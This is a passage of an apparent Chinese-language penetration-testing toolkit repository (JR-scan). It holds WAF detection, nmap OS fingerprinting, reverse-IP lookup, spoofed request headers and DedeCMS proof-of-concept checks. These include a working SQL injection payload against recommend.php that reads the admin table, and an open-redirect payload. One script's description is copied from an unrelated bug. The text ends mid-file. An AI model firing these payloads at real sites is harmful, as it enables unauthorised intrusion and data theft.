not None: #CacheFly CDN|headers|BestCDN|CacheFly' 21 | if re.search(regex, str(headers.get(position))) is not None: 22 | return name 23 | else: 24 | if re.search(regex, str(content)): #从源码中匹配 25 | return name 26 | 27 | return 'NoWAF' 28 | 29 | def checkwaf(url): #检测是否存在waf的字符串 30 | 31 | result = 'NoWAF' 32 | 33 | try: 34 | req = Requests() #实例对象 35 | r = req.get(url) #发起请求 36 | result = verify(r.headers, r.text) #正常请求检测有无WAF 37 | 38 | if result == 'NoWAF': #没有waf存在进行payload校验,检测waf 39 | for i in payload: 40 | r = req.get(url + i) 41 | result = verify(r.headers, r.text) 42 | if result != 'NoWAF': 43 | return result 44 | else: 45 | return result 46 | except (UnboundLocalError, AttributeError): 47 | pass 48 | except Exception as e: 49 | pass 50 | 51 | if __name__ == "__main__": 52 | out = checkwaf('http://127.0.0.1','test') 53 | print(out) 54 | 55 | 56 | -------------------------------------------------------------------------------- /Information_Scan/plugins/ActiveReconnaissance/osdetect.py: -------------------------------------------------------------------------------- 1 | import nmap 2 | import xml 3 | from lib.cli_output import console 4 | 5 | def osdetect(ip): #识别操作系统 6 | nm = nmap.PortScanner() #实例化 7 | try: 8 | result = nm.scan(hosts=ip, arguments='-sS -O -vv -n -T4 -p 80,22,443') #参数设置 9 | for k, v in result.get('scan').items(): 10 | if v.get('osmatch'): 11 | for i in v.get('osmatch'): 12 | console('OSdetect', ip, i.get('name') + '\n') #显示 13 | return i.get('name') #返回操作系统名称 14 | else: 15 | break 16 | except Exception as e: 17 | console('OSdetect', ip, 'None\n') 18 | 19 | if __name__ == "__main__": 20 | os = osdetect('127.0.0.1') 21 | -------------------------------------------------------------------------------- /Information_Scan/plugins/ActiveReconnaissance/robots.py: -------------------------------------------------------------------------------- 1 | import re 2 | from Information_Scan.Requests import Requests 3 | 4 | def robots(url): 5 | result = '' 6 | try: 7 | req = Requests() 8 | r = req.get(url + '/robots.txt') 9 | if r.status_code == 200 and ')\d+\.\d+\.\d+\.\d+(?=)', r.text, re.S | re.I) 14 | if result: 15 | for i in result: 16 | if iscdn(i): #是CDN服务器 17 | out.append(i) 18 | except Exception: 19 | pass 20 | 21 | return out 22 | -------------------------------------------------------------------------------- /Information_Scan/plugins/PassiveReconnaissance/reverse_domain.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import json 3 | import tldextract #tldextract准确地从URL的域名和子域名分离通用顶级域名或国家顶级域名。 4 | import re 5 | from lib.cli_output import console 6 | from Information_Scan.random_header import get_ua 7 | 8 | def reverse_domain(host): # 查询旁站 9 | result = [] 10 | data = {"remoteAddress": "{0}".format(host), "key": ""} 11 | header = get_ua() #自定义headers头 12 | try: 13 | r = requests.post('https://domains.yougetsignal.com/domains.php', 14 | headers=header, 15 | data=data, 16 | timeout=5, 17 | verify=False) 18 | text = json.loads(r.text) #返回json格式 19 | domain = tldextract.extract(host) #将URL分割,获得各个域名 http://forums.news.cnn.com/ subdomain='forums.news', domain='cnn', suffix='com' 20 | for i in text.get('domainArray'): 21 | url = i[0] 22 | if url != host: #看看域名是否一致 23 | if tldextract.extract(url).domain == domain.domain: #二级域名比较 top.baidu.com m.baidu.com 24 | result.append(url) #二级域名添加 25 | elif re.search(r'\d+\.\d+\.\d+\.\d+', url): 26 | result.append(url) #IP添加 27 | except: 28 | try: 29 | r = requests.get('http://api.hackertarget.com/reverseiplookup/?q={}'.format(host), 30 | headers=get_ua(), #自定义的headers头 31 | timeout=4, 32 | verify=False) 33 | if '' not in r.text and 'No DNS A records found for' not in r.text: #No DNS A records found for 119.3.60.210 其余情况就是出现了域名 34 | text = r.text 35 | for _ in text.split('\n'): 36 | if _: 37 | result.append(_) #添加域名 38 | else: 39 | result = [] 40 | except: 41 | pass 42 | if len(result) < 20: 43 | if result: 44 | for i in result: 45 | console('reverse_domain', host, i + '\n') #旁站进行展示 46 | else: 47 | console('reverse_domain', host, 'None\n') 48 | return result 49 | else: 50 | console('reverse_domain', host, 'The maximum number of domain names exceeded (20)\n') 51 | return ['The maximum number of reverse_domain names exceeded (20)'] 52 | 53 | -------------------------------------------------------------------------------- /Information_Scan/plugins/Scanning/__pycache__/async_scan.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/Scanning/__pycache__/async_scan.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/Scanning/__pycache__/async_scan.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/Scanning/__pycache__/async_scan.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/Scanning/__pycache__/check_target.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/Scanning/__pycache__/check_target.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/Scanning/__pycache__/check_target.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/Scanning/__pycache__/check_target.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/Scanning/__pycache__/port_scan.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/Scanning/__pycache__/port_scan.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/Scanning/__pycache__/port_scan.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/Scanning/__pycache__/port_scan.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/Scanning/check_target.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | import random 3 | import sys 4 | import urllib 5 | import requests 6 | 7 | USER_AGENT = "Mozilla/5.0 (Windows; U; MSIE 10.0; Windows NT 9.0; es-ES)" 8 | user_agent = {"user-agent": USER_AGENT} 9 | 10 | class Inspector: 11 | """ 这个类的任务是在运行时检查应用程序的行为 12 | 13 | 目的:请求一个不存在的页面""" 14 | TEST404_OK = 0 15 | TEST404_MD5 = 1 16 | TEST404_STRING = 2 17 | TEST404_URL = 3 18 | TEST404_NONE = 4 19 | 20 | def __init__(self, target): 21 | self.target = target 22 | 23 | def _give_it_a_try(self): 24 | """每次调用此方法时,它都会请求一个随机资源 25 | 26 | 目标域。返回值是一个值为的字典 27 | 28 | HTTP响应代码,resquest大小,md5的内容和内容 29 | 30 | 本身。如果有重定向,它将记录新的url""" 31 | 32 | s = [] 33 | for n in range(0, 42): 34 | random.seed() 35 | s.append(chr(random.randrange(97, 122))) 36 | s = "".join(s) 37 | 38 | target = self.target + s 39 | 40 | try: 41 | page = requests.get(target, headers=user_agent, verify=False,timeout=5) 42 | content = page.content 43 | result = { 44 | 'target': urllib.parse.urlparse(target).netloc, 45 | 'code': str(page.status_code), 46 | 'size': len(content), 47 | 'md5': hashlib.md5(content).hexdigest(), 48 | 'content': content, 49 | 'location': None 50 | } 51 | if len(page.history) >= 1: 52 | result['location'] = page.url 53 | return result 54 | except: 55 | result = { 56 | 'target': urllib.parse.urlparse(target).netloc, 57 | 'code': '', 58 | 'size': '', 59 | 'md5': '', 60 | 'content': '', 61 | 'location': None 62 | } 63 | return result 64 | 65 | def check_this(self): 66 | """Get the a request and decide what to do""" 67 | first_result = self._give_it_a_try() 68 | 69 | if first_result['code'] == '404': 70 | return '', Inspector.TEST404_OK 71 | 72 | elif first_result['code'] == '302' or first_result['location']: 73 | location = first_result['location'] 74 | return location, Inspector.TEST404_URL 75 | else: 76 | return first_result['md5'], Inspector.TEST404_MD5 77 | 78 | return '', Inspector.TEST404_NONE 79 | 80 | if __name__ == '__main__': 81 | i = Inspector(sys.argv[1]) 82 | print(i.check_this()) 83 | -------------------------------------------------------------------------------- /Information_Scan/random_header.py: -------------------------------------------------------------------------------- 1 | import random 2 | import socket 3 | import string 4 | import struct 5 | from fake_useragent import UserAgent 6 | 7 | HEADERS = { 8 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 9 | 'User-Agent': "", 10 | 'Referer': "", 11 | 'X-Forwarded-For': "", 12 | 'X-Real-IP': "", 13 | 'Connection': 'keep-alive', 14 | } 15 | 16 | def get_ua(): #自定义headers头 17 | ua = [] 18 | with open(r'Information_Scan/data/path/user-agents.txt', 'r', encoding='utf-8') as f: 19 | for i in f.readlines(): 20 | ua.append(i.strip()) # 形成路径 每行进行切换 21 | 22 | key = random.random() * 20 #随机值 23 | referer = ''.join([random.choice(string.ascii_letters + string.digits) for _ in range(int(key))]) #生成随机referer 24 | referer = 'www.' + referer.lower() + '.com' 25 | ip = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff))) #转换IPV4地址字符串(192.168.10.8)成为32位打包的二进制格式 26 | #struct.pack 按照给定的格式(fmt),把数据封装成字符串 27 | HEADERS["User-Agent"] = random.choice(ua) 28 | HEADERS["Referer"] = referer 29 | HEADERS["X-Forwarded-For"] = HEADERS["X-Real-IP"] = ip 30 | 31 | return HEADERS 32 | 33 | 34 | if __name__ == "__main__": 35 | print(get_ua()) 36 | 37 | -------------------------------------------------------------------------------- /Information_Scan/url.py: -------------------------------------------------------------------------------- 1 | from urllib import parse 2 | import re 3 | import dns.resolver 4 | 5 | 6 | def parse_host(url): #整理主机头 7 | # 根据url得到主机host 例如 http://www.baidu.com:80 返回 www.baidu.com 8 | if (not parse.urlparse(url).path) and (parse.urlparse(url).path != '/'): 9 | host = url.replace('http://', '').replace('https://', '').rstrip('/') 10 | else: 11 | host = url.replace('http://', '').replace('https://', '').rstrip('/') #删除http https 12 | host = re.sub(r'/\w+', '', host) #删除域名之外的东西 13 | if ':' in host: 14 | host = re.sub(r':\d+', '', host) #删除端口 15 | return host 16 | 17 | 18 | def parse_ip(host): #获得正常的IP, 19 | host = parse_host(host) #获得主机头 www.baidu.com 20 | # 根据domain得到ip 例如www.xxx.com 得到 x.x.x.x 21 | try: 22 | resolver = dns.resolver.Resolver() 23 | resolver.nameservers = ['1.1.1.1', '8.8.8.8'] 24 | 25 | a = resolver.query(host, 'A') #查询类型为A记录 26 | for i in a.response.answer: #检测是不是特殊的IP 27 | for j in i.items: 28 | if hasattr(j, 'address'): 29 | if not re.search(r'1\.1\.1\.1|8\.8\.8\.8|127\.0\.0\.1|114\.114\.114\.114|0\.0\.0\.0', j.address): 30 | return j.address 31 | except Exception as e: 32 | pass 33 | return host #返回正常的IP 34 | 35 | 36 | -------------------------------------------------------------------------------- /Information_Scan/web_info.py: -------------------------------------------------------------------------------- 1 | import chardet #用来检测编码格式 2 | from Information_Scan.plugins.ActiveReconnaissance.osdetect import osdetect 3 | from Information_Scan.url import parse_host, parse_ip 4 | from Information_Scan.plugins.InformationGathering.geoip import geoip 5 | from Information_Scan.Requests import Requests 6 | from lib.cli_output import console 7 | from lib.sqldb import Sqldb 8 | from Information_Scan.plugins.PassiveReconnaissance.wappalyzer import WebPage 9 | from Information_Scan.plugins.ActiveReconnaissance.check_waf import checkwaf 10 | 11 | def subdomain_save(data): 12 | Sqldb('result').get_subdomain(data) #保存到数据库 13 | 14 | def web_info(url,flags=1): #返回H5页面展示信息 15 | host = parse_host(url) #整理地址格式得到host www.baidu.com 16 | ipaddr = parse_ip(host) #获得正常的IP,排除DNS服务器 17 | url = url.strip('/') 18 | address = geoip(ipaddr) #获取IP地理位置 19 | wafresult = checkwaf(url) #检测waf 20 | req = Requests() 21 | try: 22 | r = req.get(url) #返回session的长连接 23 | coding = chardet.detect(r.content).get('encoding') #获取网站编码格式 24 | r.encoding = coding 25 | webinfo = WebPage(r.url, r.text, r.headers).info() #传入url text headers 返回cms信息 网站标题 服务器 26 | except Exception: 27 | webinfo={} 28 | 29 | if webinfo: 30 | console('Webinfo', host, 'Title: {}\n'.format(webinfo.get('title'))) 31 | console('Webinfo', host, 'Fingerprint: {}\n'.format(webinfo.get('apps'))) 32 | console('Webinfo', host, 'Server: {}\n'.format(webinfo.get('server'))) 33 | console('Webinfo', host, 'WAF: {}\n'.format(wafresult)) 34 | else: 35 | webinfo = {} 36 | wafresult = 'None' 37 | osname = osdetect(host) #操作系统名称 38 | 39 | data = { 40 | host: { 41 | 'WAF': wafresult, 42 | 'Ipaddr': ipaddr, 43 | 'Address': address, 44 | 'Webinfo': webinfo, 45 | 'OS': osname, 46 | } 47 | } 48 | 49 | if flags == 1: 50 | return data, webinfo.get('apps'), webinfo.get('title') #返回目标信息 数据 标题 51 | else: 52 | subdomain_save(data) 53 | 54 | if __name__ == "__main__": 55 | web_info('http://127.0.0.1') -------------------------------------------------------------------------------- /JR.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import gevent 3 | from gevent import monkey 4 | monkey.patch_all() 5 | from report import gener 6 | from lib.cli_output import banner 7 | from lib.cli_output import usage 8 | from lib.bcolors import Bcolors 9 | from lib.enter import add 10 | from Information_Scan.common import start 11 | from POC_Scan.main import poc_use 12 | from POC_Scan.main import search,show_poc,use 13 | from lib.sqldb import Sqldb 14 | from AWVS_Check.AWVS import awvs 15 | 16 | class JR(object): 17 | 18 | def handle(self): # 进行调度 19 | try: 20 | dbname = 'result' 21 | banner() 22 | print('-' * 43) 23 | usage() 24 | print('-' * 43) 25 | while True: 26 | show = input(Bcolors.RED + '[JR]>> ' + Bcolors.ENDC) # 红色 27 | if show in ['1','Information_Scan']: 28 | target = input(Bcolors.RED + '[JR/Information_Scan/Set_Target]>>' + Bcolors.ENDC) 29 | lives=add(target) 30 | for i in lives: 31 | start(i,dbname) 32 | 33 | elif show in ['2','POC_Scan']: 34 | poc_use() 35 | while True: 36 | command, keywords = input(Bcolors.RED + '[JR/POC_Scan/]>>' + Bcolors.ENDC).split() 37 | if command == 'search' and keywords: 38 | search(keywords) 39 | elif command == "show" and keywords == 'poc': 40 | show_poc() 41 | elif command == 'use' and keywords: 42 | target = input(Bcolors.RED+'[JR/POC_Scan/Set_Target]>>'+Bcolors.ENDC) 43 | lives=add(target) 44 | for live in lives: 45 | for i in use(keywords, live): 46 | Sqldb(dbname).get_vuln(i,keywords) 47 | elif command =='back' and keywords == 'menu': 48 | break 49 | else: 50 | print(Bcolors.WARNING + '[-] 提示: 输入错误...' + Bcolors.ENDC) 51 | 52 | elif show in ['3','AWVS_Check']: 53 | awvs_check=awvs() 54 | awvs_check.usage() 55 | while True: 56 | command= input(Bcolors.RED + '[JR/AWVS_Check/]>>' + Bcolors.ENDC) 57 | if command == 'scan': 58 | awvs_check.scan() 59 | elif command == "stop": 60 | awvs_check.stop() 61 | elif command == 'delete': 62 | awvs_check.delete() 63 | elif command =='view': 64 | awvs_check.view() 65 | elif command =='back': 66 | break 67 | else: 68 | print(Bcolors.WARNING + '[-] 提示: 输入错误...' + Bcolors.ENDC) 69 | 70 | elif show in ['4','H5_Create']: 71 | gener() 72 | elif show in ['5','Help']: 73 | usage() 74 | elif show in ['6','exit']: 75 | break 76 | elif show == '': 77 | pass 78 | else: 79 | print(Bcolors.WARNING + '[-] 提示: 输入错误...' + Bcolors.ENDC) 80 | except KeyboardInterrupt as e: 81 | print(e) 82 | 83 | if __name__ == '__main__': 84 | try: 85 | jr=JR() 86 | jr.handle() 87 | except KeyboardInterrupt: 88 | print('\nCtrl+C Stop running\n') 89 | sys.exit(0) -------------------------------------------------------------------------------- /POC_Scan/__pycache__/main.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/__pycache__/main.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/__pycache__/main.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/__pycache__/main.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/__pycache__/pocdb.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/__pycache__/pocdb.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/__pycache__/pocdb.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/__pycache__/pocdb.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/__init__.py -------------------------------------------------------------------------------- /POC_Scan/cms/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/__pycache__/cmsmain.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/__pycache__/cmsmain.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/__pycache__/cmsmain.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/__pycache__/cmsmain.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__init__.py -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_download_redirect.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_download_redirect.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_download_redirect.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_download_redirect.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_error_trace_disclosure.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_error_trace_disclosure.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_error_trace_disclosure.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_error_trace_disclosure.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_recommend_sqli.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_recommend_sqli.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_recommend_sqli.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_recommend_sqli.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_search_typeArr_sqli.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_search_typeArr_sqli.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_search_typeArr_sqli.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_search_typeArr_sqli.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_version.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_version.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_version.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_version.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/dedecms_download_redirect.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: dedecms download.php重定向漏洞 5 | referer: http://skyhome.cn/dedecms/357.html 6 | author: Lucifer 7 | description: 在dedecms 5.7sp1的/plus/download.php中67行存在的代码,即接收参数后未进行域名的判断就进行了跳转。 8 | ''' 9 | import sys 10 | import requests 11 | import warnings 12 | from termcolor import cprint 13 | 14 | class dedecms_download_redirect_BaseVerify: 15 | def __init__(self, url): 16 | self.url = url 17 | 18 | def run(self): 19 | headers = { 20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 21 | } 22 | payload = "/plus/download.php?open=1&link=aHR0cDovLzQ1Ljc2LjE1OC45MS9zc3Jm" 23 | vulnurl = self.url + payload 24 | try: 25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 26 | if r"100e8a82eea1ef8416e585433fd8462e" in req.text: 27 | cprint("[+]存在dedecms download.php重定向漏洞...(低危)\tpayload: "+vulnurl, "blue") 28 | return True 29 | else: 30 | cprint("[-]不存在dedecms_download_redirect漏洞", "white", "on_grey") 31 | 32 | except: 33 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 34 | 35 | if __name__ == "__main__": 36 | warnings.filterwarnings("ignore") 37 | testVuln = dedecms_download_redirect_BaseVerify(sys.argv[1]) 38 | testVuln.run() 39 | -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/dedecms_error_trace_disclosure.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: dedecms trace爆路径漏洞 5 | referer: http://0daysec.blog.51cto.com/9327043/1571372 6 | author: Lucifer 7 | description: 访问mysql_error_trace.inc,mysql trace报错路径泄露。 8 | ''' 9 | import sys 10 | import requests 11 | import warnings 12 | from termcolor import cprint 13 | 14 | class dedecms_error_trace_disclosure_BaseVerify: 15 | def __init__(self, url): 16 | self.url = url 17 | 18 | def run(self): 19 | headers = { 20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 21 | } 22 | payload = "/data/mysql_error_trace.inc" 23 | vulnurl = self.url + payload 24 | try: 25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 26 | if r"可能不存在漏洞", "cyan") 34 | 35 | if __name__ == "__main__": 36 | warnings.filterwarnings("ignore") 37 | testVuln = dedecms_error_trace_disclosure_BaseVerify(sys.argv[1]) 38 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/dedecms_recommend_sqli.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: dedecms recommend.php SQL注入 5 | referer: http://blog.csdn.net/change518/article/details/20564207 6 | author: Lucifer 7 | description: 1.首先执行到plus/recommand.php,包含了include/common.inc.php 8 | 2.只要提交的URL中不包含cfg_|GLOBALS|_GET|_POST|_COOKIE,即可通过检查,_FILES[type][tmp_name]被带入 9 | 3.在29行处,URL参数中的_FILES[type][tmp_name],$_key为type,$$_key即为$type,从而导致了$type变量的覆盖 10 | 4.回到recommand.php中,注入语句被带入数据库查询 11 | ''' 12 | import sys 13 | import requests 14 | import warnings 15 | from termcolor import cprint 16 | 17 | class dedecms_recommend_sqli_BaseVerify: 18 | def __init__(self, url): 19 | self.url = url 20 | 21 | def run(self): 22 | headers = { 23 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 24 | } 25 | payload = "/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa%5c%27AnD+ChAr(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,md5(1234),5,6,7,8,9%20FrOm%20`%23@__admin`%23" 26 | vulnurl = self.url + payload 27 | try: 28 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 29 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: 30 | cprint("[+]存在dedecms recommend.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red") 31 | return True 32 | else: 33 | cprint("[-]不存在dedecms_recommend_sqli漏洞", "white", "on_grey") 34 | 35 | except: 36 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 37 | 38 | if __name__ == "__main__": 39 | warnings.filterwarnings("ignore") 40 | testVuln = dedecms_recommend_sqli_BaseVerify(sys.argv[1]) 41 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/dedecms_search_typeArr_sqli.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: dedecms search.php SQL注入漏洞 5 | referer: http://0daysec.blog.51cto.com/9327043/1571372 6 | author: Lucifer 7 | description: dedecms /plus/search.php typeArr存在SQL注入,由于有的waf会拦截自行构造EXP。 8 | ''' 9 | import sys 10 | import requests 11 | import warnings 12 | from termcolor import cprint 13 | 14 | class dedecms_search_typeArr_sqli_BaseVerify: 15 | def __init__(self, url): 16 | self.url = url 17 | 18 | def run(self): 19 | headers = { 20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 21 | } 22 | payload = "/plus/search.php?keyword=test&typeArr[%20uNion%20]=a" 23 | vulnurl = self.url + payload 24 | try: 25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 26 | if r"Error infos" in req.text and r"Error sql" in req.text: 27 | cprint("[+]存在dedecms search.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red") 28 | return True 29 | else: 30 | cprint("[-]不存在dedecms_search_typeArr_sqli漏洞", "white", "on_grey") 31 | 32 | except: 33 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 34 | 35 | if __name__ == "__main__": 36 | warnings.filterwarnings("ignore") 37 | testVuln = dedecms_search_typeArr_sqli_BaseVerify(sys.argv[1]) 38 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/dedecms_version.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: dedecms版本探测 5 | referer: unknow 6 | author: Lucifer 7 | description: 亿邮邮件系统存在弱口令账户信息泄露,导致非法登录 8 | ''' 9 | import re 10 | import sys 11 | import requests 12 | import warnings 13 | from termcolor import cprint 14 | 15 | class dedecms_version_BaseVerify: 16 | def __init__(self, url): 17 | self.url = url 18 | 19 | def check_ver(self, arg): 20 | ver_histroy = {'20080307': 'v3 or v4 or v5', 21 | '20080324': 'v5 above', 22 | '20080807': '5.1 or 5.2', 23 | '20081009': 'v5.1sp', 24 | '20081218': '5.1sp', 25 | '20090810': '5.5', 26 | '20090912': '5.5', 27 | '20100803': '5.6', 28 | '20101021': '5.3', 29 | '20111111': 'v5.7 or v5.6 or v5.5', 30 | '20111205': 